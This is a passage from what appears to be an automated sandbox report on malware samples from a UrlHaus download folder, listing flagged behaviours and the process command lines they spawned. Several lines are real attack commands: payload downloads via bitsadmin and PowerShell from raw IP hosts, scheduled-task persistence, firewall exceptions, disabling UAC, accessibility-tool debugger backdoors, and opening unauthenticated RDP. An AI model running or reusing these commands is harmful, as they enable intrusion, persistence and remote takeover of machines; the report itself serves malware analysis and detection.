| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ping.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe"
C:\Windows\SysWOW64\ping.exe
ping -n 1 8.8.8.8
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
"C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\langla.exe
"C:\Users\Admin\Downloads\UrlHausFiles\langla.exe"
C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"
C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"
C:\Users\Admin\Downloads\UrlHausFiles\22.exe
"C:\Users\Admin\Downloads\UrlHausFiles\22.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE81E.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"
C:\Users\Admin\AppData\Roaming\http.exe
"C:\Users\Admin\AppData\Roaming\http.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffeaf67cc40,0x7ffeaf67cc4c,0x7ffeaf67cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1864,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2456 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4596 /prefetch:1
C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe
"C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4664 /prefetch:8
C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4656,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5112,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4628 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5344 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4896,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5336 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5520,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5484 /prefetch:2
C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D69.tmp\D6A.tmp\D6B.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE
"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10C4.tmp\10C5.tmp\10C6.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1960 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718
C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
"C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4349545209397118218,18204725807592143253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 940
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 960
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1184
C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe
"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1236
C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5740 -ip 5740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1228
C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe
"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E9A.tmp\3E9B.tmp\3E9C.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE
"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40CD.tmp\40CE.tmp\40CF.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1968 -ip 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1968 -ip 1968
